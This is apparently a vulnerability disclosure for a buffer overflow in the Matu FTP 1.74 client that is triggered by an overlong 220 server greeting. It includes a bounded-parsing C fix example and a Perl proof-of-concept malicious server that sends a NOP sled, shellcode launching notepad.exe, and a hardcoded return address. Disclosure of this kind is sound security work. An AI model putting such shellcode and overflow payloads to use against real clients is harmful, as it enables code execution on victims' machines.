Matu FTP is a Japanese FTP client for the Win32 platform.
An exploitable buffer overflow was found in Matu FTP Version 1.74.


The buffer overflow occurs when a long string like

220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA

is received by Matu FTP at the beginning of an FTP session.
This vulnerability allows a malicious FTP server to execute
arbitrary code on client hosts.
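
The advisory does not show Matu FTP's receive code, so the unbounded copy of the greeting is an assumption. The following is an added example (not from the advisory or the vendor) of parsing the 220 reply line with an explicit length check; ftp_parse_reply and FTP_TEXT_MAX are hypothetical names, and the banners in main() are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FTP_TEXT_MAX 256 /* assumed cap for this example, not a Matu FTP value */

/* Parse one FTP reply line ("220 text\r\n") received from an untrusted server.
 * Returns the 3-digit reply code, or -1 if the line is malformed or its text
 * does not fit in out (out_sz bytes). Never writes past out_sz. */
int ftp_parse_reply(const char *line, size_t len, char *out, size_t out_sz)
{
    if (out == NULL || out_sz == 0)
        return -1;
    out[0] = '\0';
    if (line == NULL || len < 4)
        return -1;
    /* Three ASCII digits, then ' ' (final line) or '-' (continuation). */
    for (int i = 0; i < 3; i++)
        if (!isdigit((unsigned char)line[i]))
            return -1;
    if (line[3] != ' ' && line[3] != '-')
        return -1;
    int code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');

    /* Strip the line terminator before measuring the text. */
    const char *text = line + 4;
    size_t tlen = len - 4;
    while (tlen > 0 && (text[tlen - 1] == '\n' || text[tlen - 1] == '\r'))
        tlen--;

    /* Reject instead of truncating: an overlong greeting is an anomaly. */
    if (tlen >= out_sz)
        return -1;
    memcpy(out, text, tlen);
    out[tlen] = '\0';
    return code;
}

int main(void)
{
    char out[FTP_TEXT_MAX], banner[512];
    const char ok[] = "220 Service ready\r\n";   /* constructed sample */
    memset(banner, 'A', sizeof banner);          /* constructed oversized greeting */
    memcpy(banner, "220 ", 4);
    printf("normal: %d\n", ftp_parse_reply(ok, strlen(ok), out, sizeof out));
    printf("overlong: %d\n", ftp_parse_reply(banner, sizeof banner, out, sizeof out));
    return 0;
}
```

The length passed in must be the number of bytes actually read from the socket, and the read itself must be bounded by the receive buffer size.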


/*---------------------------
Vendor Status
---------------------------*/
Notified with no response


/*---------------------------
POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.

#!/usr/local/bin/perl

#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;

#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

#egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;

print "220 $buf\r\n";

--

#sorry for the bad English

Kanatoko
http://www.jumperz.net/ (Japanese)


Source: http://www.xatrix.org/article1410.html